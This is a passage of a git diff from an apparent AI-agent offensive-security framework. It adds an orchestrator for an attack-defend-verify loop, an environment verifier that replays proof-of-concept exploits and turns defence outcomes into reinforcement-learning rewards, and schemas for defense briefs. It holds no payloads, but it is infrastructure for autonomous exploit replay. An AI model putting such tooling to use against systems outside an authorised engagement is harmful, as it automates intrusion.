post_positives = [r.positive for r in post.results] + pre_positives = [r.positive for r in pre.results] + flipped = sum(1 for p, q in zip(pre_positives, post_positives) if p and not q) + if 0 < flipped < len(pre_positives): + return ReAttackOutcome.PARTIAL + if flipped == len(pre_positives) and len(pre_positives) > 0: + return ReAttackOutcome.BLOCKED + return ReAttackOutcome.PASSED + + def _determine_outcome_v2( + self, + consensus: PoCConsensus, + baseline_valid: bool, + inconclusive: bool, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + is_duplicate: bool, + success_rate_threshold: float, + ) -> ReAttackOutcome: + if not baseline_valid: + return ReAttackOutcome.ERROR + if consensus.zfp_demoted: + return ReAttackOutcome.ERROR + if inconclusive: + return ReAttackOutcome.ERROR + if is_duplicate: + return ReAttackOutcome.ERROR + + if consensus.success_rate < success_rate_threshold and consensus.n_success > 0: + return ReAttackOutcome.PARTIAL + + if not consensus.agreed_signals: + return ReAttackOutcome.BLOCKED + + if pre is None: + return ReAttackOutcome.PASSED + + post_positives = [r.positive for r in post.results] + pre_positives = [r.positive for r in pre.results] + if not pre_positives: + return ReAttackOutcome.PASSED + + flipped = sum(1 for p, q in zip(pre_positives, post_positives) if p and not q) + if flipped == len(pre_positives): + return ReAttackOutcome.BLOCKED + if 0 < flipped < len(pre_positives): + return ReAttackOutcome.PARTIAL + return ReAttackOutcome.PASSED + + # ── Reward computation ──────────────────────────────────────────────── + + def compute_reward(self, evidence: VerificationEvidence) -> RLVRReward: + reward_map = { + ReAttackOutcome.BLOCKED: 1.0, + ReAttackOutcome.PARTIAL: 0.5, + ReAttackOutcome.PASSED: 0.0, + ReAttackOutcome.ERROR: 0.0, + } + pre = evidence.pre_snapshot + post = evidence.post_snapshot + total = len(post.results) + blocked_checks = 0 + if pre is not None: + for p, q in zip(pre.results, post.results): + if 
p.positive and not q.positive: + blocked_checks += 1 + + base_reward = reward_map[evidence.re_attack_outcome] + + consensus = evidence.consensus + n_runs = 1 + success_rate = 1.0 + impact_confirmed = bool(evidence.impact_signals_matched) + + if consensus is not None: + n_runs = consensus.n_runs + success_rate = consensus.success_rate + + # Confidence: success_rate * (1.0 if no impact_patterns OR impact confirmed else 0.7) + # We can only know if spec had impact_patterns by checking impact_signals_matched + # plus the absence — but absence is ambiguous. Use evidence-only signal: if any + # impact signal matched, fully confident; otherwise neutral 1.0 multiplier. + confidence = success_rate * ( + 1.0 if impact_confirmed or not evidence.impact_signals_matched else 0.7 + ) + + return RLVRReward( + finding_ref=evidence.finding_ref, + reward=base_reward, + outcome=evidence.re_attack_outcome, + blocked_checks=blocked_checks, + total_checks=total, + poc_signals_matched=len(evidence.poc_evidence.success_signals_matched), + zfp_demoted=evidence.poc_evidence.zfp_demoted, + computed_at=time.time(), + confidence=confidence, + cvss_score=evidence.cvss_estimate.base_score if evidence.cvss_estimate else None, + is_duplicate=evidence.duplicate_of is not None, + impact_confirmed=impact_confirmed, + baseline_valid=evidence.baseline_valid, + success_rate=success_rate, + n_runs=n_runs, + ) + + # ── Persistence ─────────────────────────────────────────────────────── + + def persist_snapshot(self, snapshot: EnvironmentSnapshot) -> None: + out_dir = self._workspace / "verification" + out_dir.mkdir(parents=True, exist_ok=True) + path = out_dir / f"{snapshot.finding_ref}-{snapshot.phase.value}-snapshot.json" + path.write_text(snapshot.model_dump_json(indent=2), encoding="utf-8") + log.debug("Snapshot written: %s", path) + + def persist_evidence(self, evidence: VerificationEvidence) -> None: + out_dir = self._workspace / "verification" + out_dir.mkdir(parents=True, exist_ok=True) + path = 
out_dir / f"{evidence.finding_ref}-evidence.json" + path.write_text(evidence.model_dump_json(indent=2), encoding="utf-8") + log.debug("Evidence written: %s", path) + + def persist_baseline(self, baseline: BaselineEvidence) -> None: + out_dir = self._workspace / "verification" + out_dir.mkdir(parents=True, exist_ok=True) + path = out_dir / f"{baseline.finding_ref}-baseline.json" + path.write_text(baseline.model_dump_json(indent=2), encoding="utf-8") + log.debug("Baseline written: %s", path) + + def load_baseline(self, finding_ref: str) -> BaselineEvidence | None: + path = self._workspace / "verification" / f"{finding_ref}-baseline.json" + if not path.exists(): + return None + try: + return BaselineEvidence.model_validate_json(path.read_text(encoding="utf-8")) + except Exception as exc: + log.warning("Could not load baseline %s: %s", finding_ref, exc) + return None + + def persist_reward(self, reward: RLVRReward) -> None: + rlvr_dir = self._workspace / "rlvr" + rlvr_dir.mkdir(parents=True, exist_ok=True) + rewards_path = rlvr_dir / "rewards.jsonl" + with rewards_path.open("a", encoding="utf-8") as f: + f.write(reward.model_dump_json() + "\n") + log.info( + "RLVR reward written: finding=%s outcome=%s reward=%.1f", + reward.finding_ref, + reward.outcome, + reward.reward, + ) diff --git a/decepticon/core/subagent_streaming.py b/decepticon/core/subagent_streaming.py index 7ac61e7b..cc9d2f9f 100644 --- a/decepticon/core/subagent_streaming.py +++ b/decepticon/core/subagent_streaming.py @@ -137,7 +137,7 @@ def _emit_end( def _process_messages( self, new_messages: list, - active_tool_calls: dict[str, dict], + active_tool_calls: dict[str, Any], renderer: Any, has_renderer: bool, writer: Callable | None, @@ -166,7 +166,9 @@ def _process_messages( if hasattr(msg, "tool_calls") and msg.tool_calls: for tc in msg.tool_calls: - active_tool_calls[tc["id"]] = tc + tc_id: str | None = tc.get("id") + if tc_id is not None: + active_tool_calls[tc_id] = tc tc_args = { k: str(v) if not 
isinstance(v, (str, int, float, bool)) else v for k, v in tc["args"].items() diff --git a/decepticon/llm/factory.py b/decepticon/llm/factory.py index cf5515a2..0450d188 100644 --- a/decepticon/llm/factory.py +++ b/decepticon/llm/factory.py @@ -639,7 +639,7 @@ def _create_chat_model(self, model: str, temperature: float) -> BaseChatModel: belt-and-suspenders for any future client that bypasses this factory. """ - kwargs: dict[str, object] = { + kwargs: dict[str, Any] = { "model": model, "base_url": self._proxy.url, "api_key": SecretStr(self._proxy.api_key), diff --git a/decepticon/middleware/skills.py b/decepticon/middleware/skills.py index 74c272a2..f68784a6 100644 --- a/decepticon/middleware/skills.py +++ b/decepticon/middleware/skills.py @@ -36,6 +36,7 @@ from __future__ import annotations +import logging from collections import defaultdict from typing import TYPE_CHECKING, Any @@ -43,6 +44,8 @@ from deepagents.middleware.skills import SkillsMiddleware as BaseSkillsMiddleware from langchain_core.tools import tool +_log = logging.getLogger("decepticon.middleware.skills") + if TYPE_CHECKING: from deepagents.middleware.skills import SkillMetadata @@ -140,9 +143,11 @@ class SkillsMiddleware(BaseSkillsMiddleware): Args: backend: Backend instance for file operations. sources: List of skill source paths (e.g., ``['/skills/recon/', '/skills/shared/']``). 
+ """ def __init__(self, *, backend: Any, sources: list[str]) -> None: + """Initialize with a backend and ordered skill source directories.""" super().__init__(backend=backend, sources=sources) self.system_prompt_template = DECEPTICON_SKILLS_PROMPT self.tools = [_build_load_skill_tool(backend)] @@ -155,6 +160,7 @@ def _read_workflow_for_source(self, backend: Any, source: str) -> str | None: try: res = backend.read(path) except Exception: + _log.warning("Failed to read workflow at %s (backend error)", path) return None if getattr(res, "error", None): return None @@ -172,6 +178,7 @@ async def _aread_workflow_for_source(self, backend: Any, source: str) -> str | N try: res = await backend.aread(path) except Exception: + _log.warning("Failed to async-read workflow at %s (backend error)", path) return None if getattr(res, "error", None): return None @@ -372,6 +379,7 @@ def _list_dir_via_backend(backend: Any, dir_path: str) -> list[str]: try: res = backend.ls(dir_path) except Exception: + _log.warning("Failed to list skill directory %s (backend error)", dir_path) return [] if getattr(res, "error", None): return [] diff --git a/decepticon/orchestrator.py b/decepticon/orchestrator.py new file mode 100644 index 00000000..deb13d2d --- /dev/null +++ b/decepticon/orchestrator.py @@ -0,0 +1,578 @@ +"""Vaccine Orchestrator — attack↔defend↔verify feedback loop. + +Sits above the existing Ralph offensive loop. For each finding discovered +by the offensive agent, the orchestrator: + +1. Generates a defense-brief from the finding +2. Invokes the defense agent to apply remediation +3. Re-runs the same attack vector to verify the defense holds +4. Records the verification result + +The loop continues until all findings are processed or max_iterations +is reached. 
+""" + +from __future__ import annotations + +import json +import os +from datetime import datetime, timezone +from enum import StrEnum +from pathlib import Path + +from pydantic import BaseModel, Field + +from decepticon.core.env_verifier import EnvironmentVerifier +from decepticon.core.logging import get_logger +from decepticon.schemas.defense_brief import ( + DefenseActionResult, + DefenseActionType, + DefenseBrief, + DefenseRecommendation, + ReAttackOutcome, + VerificationResult, +) +from decepticon.schemas.env_verification import CheckPhase +from decepticon.tools.bash.bash import get_sandbox +from decepticon.tools.research.poc import sandbox_runner + +log = get_logger("orchestrator") + + +# ── Enums ────────────────────────────────────────────────────────────────────── + + +class OrchestratorPhase(StrEnum): + """Current phase of the vaccine orchestration loop.""" + + ATTACK = "attack" + BRIEF_GENERATION = "brief_generation" + DEFENSE = "defense" + VERIFICATION = "verification" + COMPLETE = "complete" + + +# ── State model ──────────────────────────────────────────────────────────────── + + +class OrchestratorState(BaseModel): + """Persisted state for the vaccine orchestration loop. + + Written to ``workspace/.vaccine-state.json`` after each iteration so the + loop can be resumed after an interruption. + """ + + phase: OrchestratorPhase = OrchestratorPhase.ATTACK + iteration: int = 0 + max_iterations: int = 10 + findings_discovered: list[str] = Field(default_factory=list) + findings_processed: list[str] = Field(default_factory=list) + defenses_applied: list[DefenseActionResult] = Field(default_factory=list) + verification_results: list[VerificationResult] = Field(default_factory=list) + started_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) + + +# ── Orchestrator ─────────────────────────────────────────────────────────────── + + +class VaccineOrchestrator: + """Coordinates the attack↔defend↔verify feedback loop. 
+ + The orchestrator does not directly invoke the defense agent — it prepares + the defense brief on disk and reads back verification results that the + defense agent writes after executing its actions. This keeps the + orchestrator decoupled from agent implementation details. + + Typical external integration:: + + orchestrator = VaccineOrchestrator(workspace) + state = await orchestrator.run() + """ + + def __init__( + self, + workspace: Path, + state: OrchestratorState | None = None, + verifier: EnvironmentVerifier | None = None, + ) -> None: + self.workspace = workspace + self._state_path = workspace / ".vaccine-state.json" + self.state: OrchestratorState = ( + state if state is not None else (self._load_state() or OrchestratorState()) + ) + if verifier is not None: + self._verifier: EnvironmentVerifier | None = verifier + else: + sandbox = get_sandbox() + self._verifier = ( + EnvironmentVerifier(workspace, sandbox_runner(sandbox)) + if sandbox is not None + else None + ) + + # ── Public API ───────────────────────────────────────────────────────────── + + async def run(self) -> OrchestratorState: + """Run the vaccine loop until all findings are processed or max_iterations reached. + + Returns the final :class:`OrchestratorState`. 
+ """ + state = self.state + + while state.iteration < state.max_iterations: + state.iteration += 1 + log.info( + "Vaccine iteration %d/%d", + state.iteration, + state.max_iterations, + ) + + # Phase 1: Discover new findings + state.phase = OrchestratorPhase.ATTACK + new_findings = self._scan_findings() + state.findings_discovered = new_findings + unprocessed = [f for f in new_findings if f not in state.findings_processed] + + if not unprocessed: + log.info("No unprocessed findings remaining — loop complete") + break + + log.info( + "Found %d unprocessed finding(s): %s", + len(unprocessed), + ", ".join(unprocessed), + ) + + for finding_ref in unprocessed: + # Phase 2: Generate defense brief + state.phase = OrchestratorPhase.BRIEF_GENERATION + log.info("Generating defense brief for %s", finding_ref) + brief = self._generate_brief(finding_ref) + if brief is None: + log.warning("Could not generate brief for %s — skipping", finding_ref) + continue + self._save_brief(brief) + log.info( + "Defense brief written for %s (%d recommended action(s))", + finding_ref, + len(brief.recommended_actions), + ) + + # Phase 3: Defense + # The actual defense agent invocation happens externally. + # The orchestrator writes the brief; the defense agent reads it, + # executes actions, and writes back a verification result. 
+ state.phase = OrchestratorPhase.DEFENSE + log.info( + "Waiting for defense agent to process %s (brief at %s)", + finding_ref, + self.workspace / "defense-brief.json", + ) + + # Phase 4: Verification + state.phase = OrchestratorPhase.VERIFICATION + result = await self._verify_finding(finding_ref) + if result is not None: + state.verification_results.append(result) + if result.re_attack_outcome == ReAttackOutcome.BLOCKED: + log.info("Defense VERIFIED for %s", finding_ref) + else: + log.warning( + "Defense FAILED for %s: outcome=%s", + finding_ref, + result.re_attack_outcome, + ) + else: + log.warning( + "No verification result found for %s — defense agent may not have run", + finding_ref, + ) + + state.findings_processed.append(finding_ref) + + self._save_state() + + state.phase = OrchestratorPhase.COMPLETE + self._save_state() + log.info( + "Vaccine loop complete — %d finding(s) processed, %d verified", + len(state.findings_processed), + sum( + 1 + for r in state.verification_results + if r.re_attack_outcome == ReAttackOutcome.BLOCKED + ), + ) + return state + + @property + def summary(self) -> dict[str, object]: + """Return a summary dict with counts and current status.""" + state = self.state + verified = sum( + 1 for r in state.verification_results if r.re_attack_outcome == ReAttackOutcome.BLOCKED + ) + failed = sum( + 1 for r in state.verification_results if r.re_attack_outcome != ReAttackOutcome.BLOCKED + ) + return { + "phase": state.phase, + "iteration": state.iteration, + "max_iterations": state.max_iterations, + "findings_discovered": len(state.findings_discovered), + "findings_processed": len(state.findings_processed), + "verified": verified, + "failed": failed, + "started_at": state.started_at.isoformat(), + } + + # ── Internal helpers ─────────────────────────────────────────────────────── + + def _scan_findings(self) -> list[str]: + """Scan ``workspace/findings/`` for FIND-*.md files. + + Returns a sorted list of finding refs (e.g. 
``["FIND-001", "FIND-002"]``). + """ + findings_dir = self.workspace / "findings" + if not findings_dir.is_dir(): + log.debug("Findings directory does not exist: %s", findings_dir) + return [] + + refs: list[str] = [] + for path in sorted(findings_dir.glob("FIND-*.md")): + # Strip the ``.md`` suffix to get the bare ref (FIND-001) + refs.append(path.stem) + + log.debug("Scanned %d finding(s) from %s", len(refs), findings_dir) + return refs + + def _generate_brief(self, finding_ref: str) -> DefenseBrief | None: + """Read a finding markdown file and produce a :class:`DefenseBrief`. + + Parses key fields from the frontmatter-style header lines present in + Decepticon finding documents (``# Title``, ``**Severity**:``, etc.). + Falls back to safe defaults when fields are absent so that a brief is + always emitted for any readable finding. + + Returns ``None`` only when the finding file cannot be read. + """ + finding_path = self.workspace / "findings" / f"{finding_ref}.md" + if not finding_path.exists(): + log.warning("Finding file not found: %s", finding_path) + return None + + try: + content = finding_path.read_text(encoding="utf-8") + except OSError as exc: + log.error("Could not read finding %s: %s", finding_path, exc) + return None + + title, severity, attack_vector, affected_assets, evidence_summary = self._parse_finding( + content + ) + + recommended_actions = self._infer_recommendations(attack_vector, severity) + + return DefenseBrief( + finding_ref=finding_ref, + finding_title=title, + severity=severity, + attack_vector=attack_vector, + affected_assets=affected_assets, + recommended_actions=recommended_actions, + evidence_summary=evidence_summary, + ) + + def _parse_finding(self, content: str) -> tuple[str, str, str, list[str], str]: + """Extract structured fields from a finding markdown document. + + Returns ``(title, severity, attack_vector, affected_assets, evidence_summary)``. 
+ """ + lines = content.splitlines() + title = "Unknown Finding" + severity = "medium" + attack_vector = "" + affected_assets: list[str] = [] + evidence_summary = "" + + # Title: first H1 heading + for line in lines: + stripped = line.strip() + if stripped.startswith("# "): + title = stripped[2:].strip() + break + + # Severity: line containing "**Severity**:" or "Severity:" + for line in lines: + lower = line.lower() + if "severity" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2: + candidate = parts[1].strip().strip("*").strip().lower() + if candidate in {"critical", "high", "medium", "low", "informational"}: + severity = candidate + break + + # Attack vector: line containing "**Attack Vector**:" or section header + capture_vector = False + vector_lines: list[str] = [] + for line in lines: + lower = line.lower() + if "attack vector" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + vector_lines = [parts[1].strip()] + break + capture_vector = True + continue + if capture_vector: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped: + vector_lines.append(stripped) + if len(vector_lines) >= 3: + break + if vector_lines: + attack_vector = " ".join(vector_lines) + + # Affected assets: lines under "**Affected**:" or "**Assets**:" + capture_assets = False + for line in lines: + lower = line.lower() + if ("affected" in lower or "assets" in lower) and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + for asset in parts[1].split(","): + asset = asset.strip() + if asset: + affected_assets.append(asset) + break + capture_assets = True + continue + if capture_assets: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped.startswith("-") or stripped.startswith("*"): + asset = stripped.lstrip("-* ").strip() + if 
asset: + affected_assets.append(asset) + + # Evidence summary: first non-empty paragraph after "## Evidence" heading + capture_evidence = False + for line in lines: + stripped = line.strip() + if stripped.lower() in {"## evidence", "### evidence"}: + capture_evidence = True + continue + if capture_evidence: + if stripped.startswith("#"): + break + if stripped: + evidence_summary = stripped + break + + return title, severity, attack_vector, affected_assets, evidence_summary + + def _infer_recommendations( + self, attack_vector: str, severity: str + ) -> list[DefenseRecommendation]: + """Infer a minimal set of defensive recommendations from the attack vector text. + + Uses keyword matching to produce actionable :class:`DefenseRecommendation` + objects. The defense agent is expected to refine these based on the full + brief context. + """ + lower = attack_vector.lower() + recommendations: list[DefenseRecommendation] = [] + priority = 1 + + if any(kw in lower for kw in ("port", "tcp", "udp", "service", "listen")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.BLOCK_PORT, + target="affected-port", + priority=priority, + rationale=( + "Attack vector references a network port or listening service — " + "block inbound access as an immediate containment measure" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("ssh", "ftp", "telnet", "smb", "rdp", "vnc")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.DISABLE_SERVICE, + target="affected-service", + priority=priority, + rationale=( + "Attack vector references a remote-access protocol — " + "disable or harden the service to remove the attack surface" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("credential", "password", "token", "key", "secret", "auth")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.REVOKE_CREDENTIAL, + target="compromised-credential", + priority=priority, + 
rationale=( + "Attack vector involves credentials or authentication — " + "revoke and rotate affected credentials immediately" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("config", "misconfigur", "permission", "acl", "setting")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.UPDATE_CONFIG, + target="affected-config", + priority=priority, + rationale=( + "Attack vector references a misconfiguration — " + "update the relevant configuration to enforce secure defaults" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("process", "pid", "daemon", "spawn", "exec")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.KILL_PROCESS, + target="affected-process", + priority=priority, + rationale=( + "Attack vector involves a running process — " + "terminate the process to halt active exploitation" + ), + ) + ) + priority += 1 + + # Always recommend a firewall rule for critical/high findings with no other actions + if severity in {"critical", "high"} and not recommendations: + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.ADD_FIREWALL_RULE, + target="affected-host", + priority=1, + rationale=( + f"High-severity finding ({severity}) with no specific vector keywords — " + "add a restrictive firewall rule as a precautionary measure" + ), + ) + ) + + return recommendations + + def _save_brief(self, brief: DefenseBrief) -> None: + """Write the defense brief to ``workspace/defense-brief.json``.""" + brief_path = self.workspace / "defense-brief.json" + try: + brief_path.write_text( + brief.model_dump_json(indent=2), + encoding="utf-8", + ) + log.debug("Defense brief written to %s", brief_path) + except OSError as exc: + log.error("Failed to write defense brief: %s", exc) + + def _load_verification_result(self, finding_ref: str) -> VerificationResult | None: + """Load ``workspace/verification-{finding_ref}.json`` if it exists.""" + result_path = 
self.workspace / f"verification-{finding_ref}.json" + if not result_path.exists(): + log.debug("Verification result not found: %s", result_path) + return None + + try: + data = json.loads(result_path.read_text(encoding="utf-8")) + return VerificationResult.model_validate(data) + except (OSError, ValueError) as exc: + log.error("Failed to load verification result %s: %s", result_path, exc) + return None + + async def _verify_finding(self, finding_ref: str) -> VerificationResult | None: + """Try env-grounded verification first; fall back to legacy LLM result.""" + use_env = os.environ.get("VACCINE_USE_ENV_VERIFIER", "1") != "0" + if use_env and self._verifier is not None: + spec = self._verifier.load_spec(finding_ref) + if spec is not None: + post = await self._verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + pre = self._verifier.load_snapshot(finding_ref, CheckPhase.PRE_DEFENSE) + evidence = await self._verifier.verify_blocked(spec, pre=pre, post=post) + reward = self._verifier.compute_reward(evidence) + self._verifier.persist_evidence(evidence) + self._verifier.persist_reward(reward) + return VerificationResult( + finding_ref=finding_ref, + defense_actions_applied=[], + re_attack_outcome=evidence.re_attack_outcome, + re_attack_details=( + f"env-verified reward={reward.reward:.1f} " + f"poc_hash={evidence.poc_evidence.output_hash}" + ), + ) + return self._load_verification_result(finding_ref) + + def _save_state(self) -> None: + """Persist current :class:`OrchestratorState` to ``workspace/.vaccine-state.json``.""" + try: + self._state_path.write_text( + self.state.model_dump_json(indent=2), + encoding="utf-8", + ) + log.debug("Orchestrator state saved to %s", self._state_path) + except OSError as exc: + log.error("Failed to save orchestrator state: %s", exc) + + def _load_state(self) -> OrchestratorState | None: + """Load persisted :class:`OrchestratorState` from disk for resuming an interrupted run.""" + if not self._state_path.exists(): + return None 
+ + try: + data = json.loads(self._state_path.read_text(encoding="utf-8")) + state = OrchestratorState.model_validate(data) + log.info( + "Resumed orchestrator state from %s (iteration %d)", + self._state_path, + state.iteration, + ) + return state + except (OSError, ValueError) as exc: + log.error("Failed to load orchestrator state from %s: %s", self._state_path, exc) + return None + + +# ── Convenience entry point ──────────────────────────────────────────────────── + + +async def run_vaccine_loop( + workspace: str | Path, + max_iterations: int = 10, +) -> OrchestratorState: + """Entry point for the vaccine orchestration loop. + + Creates a fresh :class:`OrchestratorState`, builds a :class:`VaccineOrchestrator`, + and runs the full attack↔defend↔verify cycle. + + Args: + workspace: Path to the engagement workspace directory. + max_iterations: Maximum number of loop iterations before stopping. + + Returns: + The final :class:`OrchestratorState` after the loop completes. + """ + workspace = Path(workspace) + state = OrchestratorState(max_iterations=max_iterations) + orchestrator = VaccineOrchestrator(workspace, state) + return await orchestrator.run() diff --git a/decepticon/schemas/__init__.py b/decepticon/schemas/__init__.py new file mode 100644 index 00000000..00ee353a --- /dev/null +++ b/decepticon/schemas/__init__.py @@ -0,0 +1,19 @@ +"""Decepticon schemas — shared Pydantic models for inter-agent communication.""" + +from decepticon.schemas.defense_brief import ( + DefenseActionResult, + DefenseActionType, + DefenseBrief, + DefenseRecommendation, + ReAttackOutcome, + VerificationResult, +) + +__all__ = [ + "DefenseActionType", + "DefenseBrief", + "DefenseRecommendation", + "DefenseActionResult", + "ReAttackOutcome", + "VerificationResult", +] diff --git a/decepticon/schemas/defense_brief.py b/decepticon/schemas/defense_brief.py new file mode 100644 index 00000000..fd0c7a00 --- /dev/null +++ b/decepticon/schemas/defense_brief.py @@ -0,0 +1,166 @@ +"""Defense 
brief schemas — structured feedback documents for inter-agent communication. + +These models define the data contract between the offensive recon agent and the +defensive response agent (Offensive Vaccine). The flow is: + + Offensive agent → DefenseBrief → Defense agent → VerificationResult → Ralph loop + +Each DefenseBrief maps one-to-one with a finding (FIND-NNN) and carries the +structured information a defense agent needs to apply mitigations and then +re-verify via a controlled re-attack. +""" + +from __future__ import annotations + +from datetime import datetime, timezone +from enum import StrEnum + +from pydantic import BaseModel, Field + +# ── Enums ───────────────────────────────────────────────────────────── + + +class DefenseActionType(StrEnum): + """Discrete defensive action categories the defense agent can execute. + + Each value maps to a concrete remediation primitive the sandbox or + target host can perform. The defense agent selects one or more per finding. + """ + + BLOCK_PORT = "block_port" + ADD_FIREWALL_RULE = "add_firewall_rule" + DISABLE_SERVICE = "disable_service" + RESTART_SERVICE = "restart_service" + UPDATE_CONFIG = "update_config" + KILL_PROCESS = "kill_process" + REVOKE_CREDENTIAL = "revoke_credential" + + +class ReAttackOutcome(StrEnum): + """Outcome of re-running the original attack after defensive actions were applied. + + Used to determine whether a defense was effective, partial, or failed. + """ + + BLOCKED = "blocked" # Attack was fully mitigated — finding is closed + PASSED = "passed" # Attack still succeeds — defense was ineffective + PARTIAL = "partial" # Attack partially mitigated — follow-up needed + ERROR = "error" # Re-attack could not complete (infra/tooling issue) + + +# ── Models ───────────────────────────────────────────────────────────── + + +class DefenseRecommendation(BaseModel): + """A single recommended defensive action from the offensive agent. + + The offensive agent populates these inside a DefenseBrief. 
The defense + agent reads them and decides which to execute, in which order. + """ + + action_type: DefenseActionType = Field(description="Category of defensive action to take") + target: str = Field( + description=( + "What to act on — port notation (e.g. 'tcp/8080'), service name " + "(e.g. 'sshd'), IP/hostname (e.g. '10.0.0.5'), or credential ID" + ) + ) + parameters: dict[str, str] = Field( + default_factory=dict, + description="Action-specific key/value parameters (e.g. {'rule': 'DROP', 'chain': 'INPUT'})", + ) + priority: int = Field( + default=1, + description="Execution priority: 1 = highest. Lower numbers run first.", + ) + rationale: str = Field( + description="Why this action is recommended — links back to the attack vector" + ) + + +class DefenseBrief(BaseModel): + """Structured feedback document passed from the offensive agent to the defense agent. + + One DefenseBrief is generated per finding. It carries everything the defense + agent needs to understand the vulnerability and apply targeted mitigations + without needing to re-read raw findings files. + """ + + finding_ref: str = Field(description="Reference to the source finding, e.g. 
'FIND-001'") + finding_title: str = Field(description="Human-readable title matching the finding document") + severity: str = Field( + description=( + "Finding severity using FindingSeverity values: " + "critical, high, medium, low, informational" + ) + ) + attack_vector: str = Field( + description="Description of how the attack worked — what was exploited and how" + ) + affected_assets: list[str] = Field( + default_factory=list, + description="IPs, hostnames, and service identifiers affected by this finding", + ) + recommended_actions: list[DefenseRecommendation] = Field( + default_factory=list, + description="Ordered list of defensive actions the defense agent should consider", + ) + evidence_summary: str = Field( + default="", + description="Brief summary of exploitation evidence from the offensive run", + ) + created_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc), + description="Timestamp when this brief was generated (UTC)", + ) + + +class DefenseActionResult(BaseModel): + """Result of executing a single defensive action on the target. + + Populated by the defense agent after attempting each action from a + DefenseRecommendation. Collected into a VerificationResult. 
+ """ + + action_type: DefenseActionType = Field( + description="The type of defensive action that was executed" + ) + target: str = Field(description="The specific target the action was applied to") + success: bool = Field(description="Whether the action was applied successfully") + message: str = Field( + description="Human-readable result message — include error detail on failure" + ) + rollback_command: str | None = Field( + default=None, + description="Shell command to undo this action if needed during deconfliction", + ) + executed_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc), + description="Timestamp when the action was executed (UTC)", + ) + + +class VerificationResult(BaseModel): + """Result of re-attack verification after defensive actions were applied. + + The defense agent populates this after executing all actions from a + DefenseBrief and performing a controlled re-attack. The ralph loop reads + this to determine whether to close the finding or escalate. + """ + + finding_ref: str = Field(description="Reference to the finding being verified, e.g. 
'FIND-001'") + defense_actions_applied: list[DefenseActionResult] = Field( + default_factory=list, + description="Results for every defensive action that was attempted", + ) + re_attack_outcome: ReAttackOutcome = Field( + description="Whether the re-attack was blocked, passed, partial, or errored" + ) + re_attack_details: str = Field( + default="", + description="What happened during the re-attack — tool output, observations, conclusions", + ) + verified_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc), + description="Timestamp when re-attack verification completed (UTC)", + ) diff --git a/decepticon/schemas/env_verification.py b/decepticon/schemas/env_verification.py new file mode 100644 index 00000000..35134234 --- /dev/null +++ b/decepticon/schemas/env_verification.py @@ -0,0 +1,114 @@ +"""Environment-grounded verification schemas replacing LLM-judged VerificationResult.""" + +from __future__ import annotations + +import time +from enum import StrEnum +from typing import Any + +from pydantic import BaseModel, Field + +from decepticon.schemas.defense_brief import ReAttackOutcome + + +class CheckPhase(StrEnum): + PRE_DEFENSE = "pre_defense" + POST_DEFENSE = "post_defense" + + +class TargetCheckResult(BaseModel): + check_id: str + kind: str + phase: CheckPhase + signal: dict[str, Any] = Field(default_factory=dict) + positive: bool + raw_excerpt: str = "" + + +class EnvironmentSnapshot(BaseModel): + finding_ref: str + phase: CheckPhase + results: list[TargetCheckResult] = Field(default_factory=list) + captured_at: float = Field(default_factory=time.time) + + +class PoCEvidence(BaseModel): + exit_code: int + success_signals_matched: list[str] + zfp_demoted: bool + output_hash: str + stdout_excerpt: str = "" + stderr_excerpt: str = "" + + +class PoCRunResult(BaseModel): + run_index: int + exit_code: int + signals_matched: list[str] + output_hash: str + stdout_excerpt: str = "" + stderr_excerpt: str = "" + succeeded: bool + + +class 
PoCConsensus(BaseModel): + n_runs: int + n_success: int + success_rate: float + agreed_signals: list[str] + zfp_demoted: bool + run_results: list[PoCRunResult] + + +class BaselineEvidence(BaseModel): + finding_ref: str + valid: bool + consensus: PoCConsensus + captured_at: float = Field(default_factory=time.time) + + +class CVSSEstimate(BaseModel): + attack_vector: str = "N" + attack_complexity: str = "L" + privileges_required: str = "N" + user_interaction: str = "N" + scope: str = "U" + confidentiality: str = "N" + integrity: str = "N" + availability: str = "N" + base_score: float = 0.0 + vector_string: str = "" + + +class VerificationEvidence(BaseModel): + finding_ref: str + pre_snapshot: EnvironmentSnapshot | None + post_snapshot: EnvironmentSnapshot + poc_evidence: PoCEvidence + re_attack_outcome: ReAttackOutcome + verified_at: float = Field(default_factory=time.time) + baseline_evidence: BaselineEvidence | None = None + consensus: PoCConsensus | None = None + impact_signals_matched: list[str] = Field(default_factory=list) + cvss_estimate: CVSSEstimate | None = None + duplicate_of: str | None = None + baseline_valid: bool = True + inconclusive: bool = False + + +class RLVRReward(BaseModel): + finding_ref: str + reward: float # 0.0, 0.5, or 1.0 + outcome: ReAttackOutcome + blocked_checks: int = 0 + total_checks: int = 0 + poc_signals_matched: int = 0 + zfp_demoted: bool = False + computed_at: float = Field(default_factory=time.time) + confidence: float = 1.0 + cvss_score: float | None = None + is_duplicate: bool = False + impact_confirmed: bool = False + baseline_valid: bool = True + success_rate: float = 1.0 + n_runs: int = 1 diff --git a/decepticon/schemas/exploit_spec.py b/decepticon/schemas/exploit_spec.py new file mode 100644 index 00000000..d3495282 --- /dev/null +++ b/decepticon/schemas/exploit_spec.py @@ -0,0 +1,68 @@ +"""Machine-readable exploit replay spec written by offensive agents at finding time.""" + +from __future__ import annotations + +from 
